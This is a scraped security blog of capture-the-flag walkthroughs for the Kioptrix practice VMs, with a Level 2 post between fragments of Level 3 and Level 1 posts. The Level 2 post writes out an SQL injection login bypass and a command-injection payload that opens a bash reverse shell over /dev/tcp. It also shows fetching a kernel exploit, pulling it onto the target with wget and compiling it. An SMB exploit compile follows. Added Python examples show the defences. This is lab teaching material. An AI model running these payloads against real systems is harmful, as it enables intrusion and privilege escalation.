<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHBOWQvMQJ9GH1hN172E1U9-XI3BITKO98W_h_RiAenzgqzz6zwkiV6Yct7rSscafV6MApUFU8AllPbWFrGeTiWBRmfI4gtvKOqT2xNcz_rl2-LY6zi9xL2obeFNOjMvvF4a07oVPt7GM/s1600/Screenshot+from+2017-02-15+12-03-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHBOWQvMQJ9GH1hN172E1U9-XI3BITKO98W_h_RiAenzgqzz6zwkiV6Yct7rSscafV6MApUFU8AllPbWFrGeTiWBRmfI4gtvKOqT2xNcz_rl2-LY6zi9xL2obeFNOjMvvF4a07oVPt7GM/s400/Screenshot+from+2017-02-15+12-03-41.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The current DB in use here is gallery.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBIYVt7hkbLUIAQ7nQnhJQGjwX-EvuhkfSsow1QeXUrEksWUTYBbBToW2osE9nYK3JxHFIjGPD_FcTKOI7FDGOZJligC5yuVKUoUZ2jCUxhHvwUqm-74Ldpa6ZFqf5XLL4Ih-7KHrN_LU/s1600/Screenshot+from+2017-02-15+13-19-02.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBIYVt7hkbLUIAQ7nQnhJQGjwX-EvuhkfSsow1QeXUrEksWUTYBbBToW2osE9nYK3JxHFIjGPD_FcTKOI7FDGOZJligC5yuVKUoUZ2jCUxhHvwUqm-74Ldpa6ZFqf5XLL4Ih-7KHrN_LU/s400/Screenshot+from+2017-02-15+13-19-02.png" width="400" /></a><br />
And there are these tables sitting on the server too.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s1600/Screenshot+from+2017-02-15+13-22-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s400/Screenshot+from+2017-02-15+13-22-08.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Enumerating the table "dev_accounts" gave:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s1600/Screenshot+from+2017-02-15+13-22-08.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBQGdgsyYdv4SRcSlarr10M_zrJr5jf4cnKKGi_TFEwhF21zGLB8j4_VgGYn5PlFVz7DhIBPSFJIMKUn6F4RoRrc5xZniqB2XGqWXJG2u9ukl4n3sG4TxYKUQhIRORD4urPQdz14TcWkU/s400/Screenshot+from+2017-02-15+13-22-08.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Grabbing the details from this gave:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuI6n58PcZdu4P5RV31K5R3RJ1batNRBoVMD02vXpFV74VLz5IwBJpRLgQYAW35L2DdAdNSg5HtQznEBPteh5tIDdxt8MZX2SpzXEzZEQHfJ4yM9Oui7rO7B0nDy6F9-GhbVkSkPhlL5o/s1600/Screenshot+from+2017-02-15+13-26-33.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuI6n58PcZdu4P5RV31K5R3RJ1batNRBoVMD02vXpFV74VLz5IwBJpRLgQYAW35L2DdAdNSg5HtQznEBPteh5tIDdxt8MZX2SpzXEzZEQHfJ4yM9Oui7rO7B0nDy6F9-GhbVkSkPhlL5o/s400/Screenshot+from+2017-02-15+13-26-33.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
MD5 hashed passwords for the 2 users we already had :)<br />
<br />
I could have used sqlmap to make it easier, but sometimes you need to check manually as automation doesn't always make things better!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvcRtBFGsWE_3StYzQi1aYrZ9y_oZ1eHkLAjkBk-og-1QUYbDhkZLfHLrDAx6lIOOF6qoQ_f3dQSikDmlMSBQGRSsTM-itMR8x7_v-MvXGSpC2Mb9LPH01f3Rc4_rbIIcKOfOulMtOlw/s1600/Screenshot+from+2017-02-15+13-37-36.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvcRtBFGsWE_3StYzQi1aYrZ9y_oZ1eHkLAjkBk-og-1QUYbDhkZLfHLrDAx6lIOOF6qoQ_f3dQSikDmlMSBQGRSsTM-itMR8x7_v-MvXGSpC2Mb9LPH01f3Rc4_rbIIcKOfOulMtOlw/s400/Screenshot+from+2017-02-15+13-37-36.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u><br /></u></b>
<b><u>SQLi for Admin</u></b><br />
<b><u><br /></u></b>
By enumerating the gallarific_users table we get:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLse4xFtqvw84k3ihDg0sqtv5u9kXKA_VxIjPGGZfOpeYa4sm9nelkad3o3mh5khLryKv6JJ7yWz0mvSHhXLPfkmVD7VemVMZQD0VWMPOvwlENtMhms8zy79pZeM8mKAyY7FSzdyg23U/s1600/Screenshot+from+2017-02-15+13-45-32.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnLse4xFtqvw84k3ihDg0sqtv5u9kXKA_VxIjPGGZfOpeYa4sm9nelkad3o3mh5khLryKv6JJ7yWz0mvSHhXLPfkmVD7VemVMZQD0VWMPOvwlENtMhms8zy79pZeM8mKAyY7FSzdyg23U/s400/Screenshot+from+2017-02-15+13-45-32.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Which allows me to log in to the myphpadmin page and grab the creds of loneferret and dreg.<br />
<br />
There are other ways to root this box like using code injection to get a netcat shell, so go wild!!!<br />
<br />
<br /></div>
Volta Security (http://www.blogger.com/profile/16435992433390099875), published 2017-02-08T13:57:00+00:00, updated 2017-02-08T14:19:38+00:00: Kioptrix Level 2 Ping This!<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I am really liking this VM series so far, as I am the first to admit that my web app fu is not the best. This is allowing me to go back and test against simpler things as a confidence check for myself.<br />
<br />
So how did I root this VM?<br />
<br />
<b><u>It started with a scan</u></b><br />
<b><u><br />
</u></b> After performing a full 1-65535 port scan using Nmap, I found the following ports were open.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJuoYGNzRCUd2Ooy79xS86ONcib7v4jrbBb2t2jG7kxvtKb0eZWs9ZenDgW_jjHzBYQ0Z-GmAZzbZZL0xOg40ZrJAQcoA95w-FanKfrPo1OVdWouJ2-0iKsKp_x0mTWai23JMRjWLTJXA/s1600/Screenshot+from+2017-02-08+10-00-24.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJuoYGNzRCUd2Ooy79xS86ONcib7v4jrbBb2t2jG7kxvtKb0eZWs9ZenDgW_jjHzBYQ0Z-GmAZzbZZL0xOg40ZrJAQcoA95w-FanKfrPo1OVdWouJ2-0iKsKp_x0mTWai23JMRjWLTJXA/s400/Screenshot+from+2017-02-08+10-00-24.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looking at the results it seemed sensible to look at port 80 first.<br />
<br />
This is what greeted me:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj79g6jD1kcrEyE83lh3h3M5yR27_X4V979YU_rwjHVIWg53K3ECneHDyGzS3nIfTZE8M1Ossr2_bNBUL7yOgICa2ZfOOA9N206uvUdlF5-6FEJnjdWJqHIgfeooePlxFYZN5rUoIKrp4Y/s1600/Screenshot+from+2017-02-08+10-02-29.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj79g6jD1kcrEyE83lh3h3M5yR27_X4V979YU_rwjHVIWg53K3ECneHDyGzS3nIfTZE8M1Ossr2_bNBUL7yOgICa2ZfOOA9N206uvUdlF5-6FEJnjdWJqHIgfeooePlxFYZN5rUoIKrp4Y/s400/Screenshot+from+2017-02-08+10-02-29.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
An admin login screen. After throwing some random input into the user and pass fields, it showed it was sat on "index.php". My first thought was "SQL injection", and it turned out I was right.<br />
<br />
A simple:<br />
<br />
<pre class="brush: bash">' OR 1 = 1 -- (don't forget the space after the last - )
</pre>
Gave me access to this page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8qu0YiXHejvEBOeb-rd_sf7WocxKUuK3ifAyuoUxrpKt2RyRlW5dQatHejjlzGwOQADc1z297ksVIo26pC0IuJqkaBekxOSclXA6LRDqEpNu8XlunkjWksfwfH8uAo9FNDW4pTfx62iA/s1600/Screenshot+from+2017-02-08+10-10-35.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8qu0YiXHejvEBOeb-rd_sf7WocxKUuK3ifAyuoUxrpKt2RyRlW5dQatHejjlzGwOQADc1z297ksVIo26pC0IuJqkaBekxOSclXA6LRDqEpNu8XlunkjWksfwfH8uAo9FNDW4pTfx62iA/s400/Screenshot+from+2017-02-08+10-10-35.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
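To show why the login form here and the gallery id parameter in the Kioptrix 3 post above both fell to injection, here is an added example (not code from either post or from Kioptrix) that runs the ' OR 1 = 1 --  bypass against a string-built query and against a parameterised one, and does the same for a UNION appended to the id value. It uses an in-memory SQLite database with constructed rows in place of MySQL, and the function names are my own.

```python
"""Why the admin login on index.php (Kioptrix 2) and the gallery id
parameter (Kioptrix 3) both fell to SQL injection, and what changes when
the query is parameterised. Added example, not code from the posts or from
Kioptrix; an in-memory SQLite database stands in for the MySQL backend and
the rows are constructed."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users  (id INTEGER, username TEXT, password TEXT);
    INSERT INTO users  VALUES (1, 'admin', 'constructed-secret');
    CREATE TABLE photos (id INTEGER, title TEXT, path TEXT);
    INSERT INTO photos VALUES (1, 'holiday', '/gallery/1.jpg');
    INSERT INTO photos VALUES (2, 'office',  '/gallery/2.jpg');
""")


def vulnerable_login(username, password):
    """The index.php pattern: form fields pasted straight into the SQL text,
    so ' OR 1 = 1 --  turns the WHERE clause into something always true and
    comments out the password check."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(username, password):
    """Same query with bound parameters: the input is data, never SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def vulnerable_photo(photo_id):
    """The gallery id parameter spliced in as text: a UNION appended to it
    makes the page print attacker-chosen values in the displayed column."""
    sql = f"SELECT id, title, path FROM photos WHERE id = {photo_id}"
    return conn.execute(sql).fetchall()


def safe_photo(photo_id):
    """Insist on a positive integer, then bind it; no UNION survives this."""
    if not str(photo_id).isdigit():
        raise ValueError(f"photo id must be a positive integer: {photo_id!r}")
    sql = "SELECT id, title, path FROM photos WHERE id = ?"
    return conn.execute(sql, (int(photo_id),)).fetchall()


if __name__ == "__main__":
    bypass = "' OR 1 = 1 -- "
    print("vulnerable login:", vulnerable_login(bypass, "anything"))
    print("safe login:      ", safe_login(bypass, "anything"))
    leak = "1 UNION SELECT 1, sqlite_version(), 'x'"
    print("vulnerable photo:", vulnerable_photo(leak))
    try:
        safe_photo(leak)
    except ValueError as err:
        print("safe photo:      ", err)
```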
I pinged an IP on my network and got this:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0RLMzoIF0zjitP2OiHgYaX5bcs70JUG0bR2bJGYOisjS2ggGTk0JgnK0e2eanRrSYNPsS4yEVT7ODYd-J4vBQfHPdDBP5LujWSmKcJTFMdiFi2w4LPEws8AxKwLbLz2fvCyNOiFmjmE/s1600/Screenshot+from+2017-02-08+10-11-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg0RLMzoIF0zjitP2OiHgYaX5bcs70JUG0bR2bJGYOisjS2ggGTk0JgnK0e2eanRrSYNPsS4yEVT7ODYd-J4vBQfHPdDBP5LujWSmKcJTFMdiFi2w4LPEws8AxKwLbLz2fvCyNOiFmjmE/s400/Screenshot+from+2017-02-08+10-11-49.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It looks like putting in an IP address and clicking submit calls the pingit.php page. This echoes back the IP I typed and then actually pings it. There is a chance I can inject my own commands here.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b><u>Command injection </u></b><br />
<b><br />
</b> <u><a href="http://cwe.mitre.org/data/definitions/78.html"><i>Definition</i></a></u><br />
<b><u><br />
</u></b> This method is great for getting shells on boxes.<br />
<br />
A look at the source code showed:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfBzOK1uXSL_D9-I-SHGI8xXs_dmPuJIn7JUEEkYrkg9A6jcqE6y3YqzKhYIgOfoyBKM2CN1FK3WdTymb3pmYdNUVGIsG5AL3N5CGZEAMXLjF6oFxJXbnQaRXzMRExYdzaYvjb7rvh6Wg/s1600/Screenshot+from+2017-02-08+10-21-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfBzOK1uXSL_D9-I-SHGI8xXs_dmPuJIn7JUEEkYrkg9A6jcqE6y3YqzKhYIgOfoyBKM2CN1FK3WdTymb3pmYdNUVGIsG5AL3N5CGZEAMXLjF6oFxJXbnQaRXzMRExYdzaYvjb7rvh6Wg/s400/Screenshot+from+2017-02-08+10-21-49.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The data in the box isn't being sanitised, so my chances of injection now look good :)<br />
<br />
I try to list the directory of the website:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmppZUmqz3rYAtEk-OrZAwbcq_3zV7ddJmNyALFUrKtPfp1Q9K4H7qihcdf87fbsDbl1hy8DGGi4c_tqwlsWykbNbD4WAPhoKjEE6gXIyCDLYycSumbR17gAVotkYEMrnxpq9Pe_GhgA/s1600/Screenshot+from+2017-02-08+10-29-18.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmppZUmqz3rYAtEk-OrZAwbcq_3zV7ddJmNyALFUrKtPfp1Q9K4H7qihcdf87fbsDbl1hy8DGGi4c_tqwlsWykbNbD4WAPhoKjEE6gXIyCDLYycSumbR17gAVotkYEMrnxpq9Pe_GhgA/s320/Screenshot+from+2017-02-08+10-29-18.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And it works!<br />
<br />
Now to try to see if I can use a simple bash reverse shell with a netcat listener:<br />
<br />
On my attack box I type:<br />
<br />
<pre class="brush: bash">netcat -v -l -p 4444 </pre>
<br />
This is essentially making my box sit and listen for any connections calling into it on this port.<br />
<br />
On the vulnerable web app I type:<br />
<br />
<pre class="brush: bash">192.168.1.1; bash -i >& /dev/tcp/192.168.1.17/4444 0>&1
</pre>
<br />
This should open a bash reverse shell on my machine.<br />
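The injection works because the form field is handed to a shell unchanged. As an added example (not code from this post or from the Kioptrix VM), here is that pattern next to a hardened version in Python, plus a check that flags shell metacharacters in logged form parameters. The handler names, the /ping.php path and the access-log lines are all constructed for illustration.<br />

```python
"""Command injection in a "ping this host" form: vulnerable pattern,
hardened pattern, and an access-log check. Added example for this
walkthrough; a hypothetical handler, not the code running on the VM."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit


def build_ping_command_unsafe(user_input):
    """Vulnerable pattern: the form field is spliced into a shell command
    line (as if for os.system or subprocess with shell=True). A ';', '|',
    '&&', backticks or $(...) in the field becomes shell syntax, which is
    exactly what the walkthrough above relies on. Returned, never run."""
    return "ping -c 3 " + user_input


def is_valid_ping_target(user_input):
    """Allow-list check: the field must parse as one IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(user_input.strip())
    except ValueError:
        return False
    return True


def build_ping_command_safe(user_input):
    """Hardened pattern: validate first, then pass the value as its own
    argv element so no shell ever parses it (subprocess.run(argv)).
    Raises ValueError for anything that is not a bare IP address."""
    if not is_valid_ping_target(user_input):
        raise ValueError("ping target must be a single IP address")
    return ["ping", "-c", "3", str(ipaddress.ip_address(user_input.strip()))]


# Characters that have no business in an IP-address field and that a shell
# would interpret. Used for after-the-fact review of web server logs.
SHELL_META = re.compile(r"[;&|`$<>\r\n]")

# Constructed Apache-style access log lines (not from the VM). Only GET
# query strings are visible in an access log; a POST body would need the
# application log or a WAF to capture it.
ACCESS_LOG = """\
192.168.1.17 - - [08/Feb/2017:10:21:49 +0000] "GET /ping.php?ip=192.168.1.1 HTTP/1.1" 200 512
192.168.1.17 - - [08/Feb/2017:10:29:18 +0000] "GET /ping.php?ip=192.168.1.1%3B+ls+-la HTTP/1.1" 200 2048
192.168.1.17 - - [08/Feb/2017:10:31:02 +0000] "GET /index.php HTTP/1.1" 200 163
192.168.1.17 - - [08/Feb/2017:10:38:41 +0000] "GET /ping.php?ip=192.168.1.1%3B+id HTTP/1.1" 200 96
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def find_injection_attempts(log_text):
    """Return one finding per query-string parameter that contains shell
    metacharacters: {"line": n, "param": name, "value": decoded value}."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if SHELL_META.search(value):
                    findings.append({"line": lineno, "param": name, "value": value})
    return findings


if __name__ == "__main__":
    print(build_ping_command_unsafe("192.168.1.1; id"))  # the shell would see two commands
    print(build_ping_command_safe("192.168.1.1"))
    for f in find_injection_attempts(ACCESS_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r}")
```

The fix is the combination of an allow-list (the field must be an IP address, nothing else) and never letting a shell see the value; either on its own is weaker. The log check is for triage, not prevention: it only sees what the web server logs.<br />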
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSKuqBoC4HXuNKfK3NLy9nHWuDtNYQLc3ZnpPJMGg1p4GObLc4vByk5BUBjxN-RMMQMvUHRfA8IFPunoyFKRKfktXMBhNrQHe1YfiKAIIkVXQ3UW9HULe7tilxDtRRJSD6pPyB311RIVE/s1600/Screenshot+from+2017-02-08+10-38-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSKuqBoC4HXuNKfK3NLy9nHWuDtNYQLc3ZnpPJMGg1p4GObLc4vByk5BUBjxN-RMMQMvUHRfA8IFPunoyFKRKfktXMBhNrQHe1YfiKAIIkVXQ3UW9HULe7tilxDtRRJSD6pPyB311RIVE/s400/Screenshot+from+2017-02-08+10-38-41.png" width="400" /></a></div>
<br />
<br /></div>
<br />
And it does. Unfortunately I am only in as apache, so I need to look at elevating my privileges in order to root this box.<br />
<br />
Now it was time to start enumerating the box to see what was under the hood.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyigeKtg23wPOFMwsOkQ3-o892tUBlfFwEdlYt526zucjMJn810IEC9wcr-HRm7uMpvk0y0wjk6RZu18DjkSp0aDToRJSTQq5HMXLWxaI6ZR-pXT3zS-4-h_N6R4jxIeHeZKmzfbhRFRo/s1600/Screenshot+from+2017-02-08+13-25-51.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyigeKtg23wPOFMwsOkQ3-o892tUBlfFwEdlYt526zucjMJn810IEC9wcr-HRm7uMpvk0y0wjk6RZu18DjkSp0aDToRJSTQq5HMXLWxaI6ZR-pXT3zS-4-h_N6R4jxIeHeZKmzfbhRFRo/s400/Screenshot+from+2017-02-08+13-25-51.png" width="400" /></a></div>
<br />
Looks like I have CentOS 4.5 sat on Linux kernel 2.6.9. Research led me to <a href="https://www.exploit-db.com/exploits/9542/">Exploit-DB</a>.<br />
This exploit scores reasonably high over at <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2698">National Vulnerability Database</a> so should be quite useful!<br />
<br />
I need to see what other tools are sat on this box as I need to be able to transfer the file over.<br />
<br />
A quick try of wget shows it's installed, so that will be handy :)<br />
<br />
On my attack box, I wget the code from Exploit-DB:<br />
<br />
<pre class="brush: bash">wget https://www.exploit-db.com/download/9542</pre>
<br />
I then start up a web server on my attack box:<br />
<br />
<pre class="brush: bash">python -m SimpleHTTPServer 80 </pre>
<br />
Now that I am serving the file, I can transfer it to the vulnerable server.<br />
<br />
I wget the file from my attack box:<br />
<br />
<pre class="brush: bash">cd /tmp</pre>
This is a location I can write to.<br />
<br />
<pre class="brush: bash">wget http://192.168.1.17/9542.c</pre>
<br />
Now I have the code, it's time to compile it.<br />
<br />
<pre class="brush: bash">gcc -o pwn 9542.c</pre>
<br />
I now have an executable file to run.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3uY5LmO60_90esHygFxP4768g7rsWQWLy0FzDbNwMc2VuwFRiK7Ur_Dz9HrCPcBIjX2szh0CE0vLR9oVqXhG1gJbiPevm6XYX0BY2isQrdm841i55i8XcaVztUXG2xBKBBRbvV6yP5mc/s1600/Screenshot+from+2017-02-08+13-54-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3uY5LmO60_90esHygFxP4768g7rsWQWLy0FzDbNwMc2VuwFRiK7Ur_Dz9HrCPcBIjX2szh0CE0vLR9oVqXhG1gJbiPevm6XYX0BY2isQrdm841i55i8XcaVztUXG2xBKBBRbvV6yP5mc/s400/Screenshot+from+2017-02-08+13-54-07.png" width="400" /></a></div>
<br />
Another #tangodown <br />
<br />
<b><u>Conclusion</u></b><br />
<b><u><br /></u></b>
I went into this VM with an attitude that I was going to be looking for local exploits (SUID) for some reason? This sent me off on a bit of a tangent to be honest. However once I slapped myself, I got there quickly.<br />
<br />
Until next time, bye!!!!! </div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-53155282011359645772017-02-07T10:26:00.004+00:002017-02-08T14:19:38.020+00:00Kioptrix Level 1 (Via SMB)<div dir="ltr" style="text-align: left;" trbidi="on">
Round 2 of Kioptrix!!<br />
<br />
As we saw from the initial NMap scan port 139 was open.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOmR4J6t-pB94TMbR_IPwzH_ZdqSy0O9Z5GGDPQ6dOvBNjXopmkYSffNFJIciZZpUliXZMwMSA8XIRZncDQv-udLUMAQkUdk7ZXa_hqku0B9IkKrWrgYChcorC4_CrL3s5y0kzB9ABK1M/s1600/Screenshot+from+2017-01-23+10-24-28.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOmR4J6t-pB94TMbR_IPwzH_ZdqSy0O9Z5GGDPQ6dOvBNjXopmkYSffNFJIciZZpUliXZMwMSA8XIRZncDQv-udLUMAQkUdk7ZXa_hqku0B9IkKrWrgYChcorC4_CrL3s5y0kzB9ABK1M/s640/Screenshot+from+2017-01-23+10-24-28.png" width="640" /></a></div>
<br />
It's time to start prodding that beast. I use SMBClient to see if anonymous logins are allowed:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbDjzzY2lao1F6ciC8FcRsML_CQcsM5ih_mBa4PDdD3ZWnsKLAuL07W1rK8bO-trgdtO65BNtf57r697FKPJwdGGREhL7aN2xr0fj3oiClCKVyB8Ct9GJqui_iUbeuK9sF_hyphenhyphentnxDEXw/s1600/Screenshot+from+2017-02-07+09-58-02.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbDjzzY2lao1F6ciC8FcRsML_CQcsM5ih_mBa4PDdD3ZWnsKLAuL07W1rK8bO-trgdtO65BNtf57r697FKPJwdGGREhL7aN2xr0fj3oiClCKVyB8Ct9GJqui_iUbeuK9sF_hyphenhyphentnxDEXw/s400/Screenshot+from+2017-02-07+09-58-02.png" width="400" /></a></div>
<br />
I will take that as a yes!<br />
<br />
The SMB version running is 2.2.1a so it's time to start looking for exploits!<br />
<br />
Using searchsploit I found 2 possibilities for manual execution (I want to stay away from Metasploit):<br />
<br />
7.pl & 10.c<br />
<br />
I had a look at the 10.c exploit on <a href="https://www.exploit-db.com/exploits/10/">Exploit-DB</a>.<br />
<br />
This seemed to be a good exploit to look at.<br />
<br />
Time to grab and compile!!<br />
<br />
<pre class="brush: bash">gcc -o smb 10.c </pre>
<br />
So let's run this little beast.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
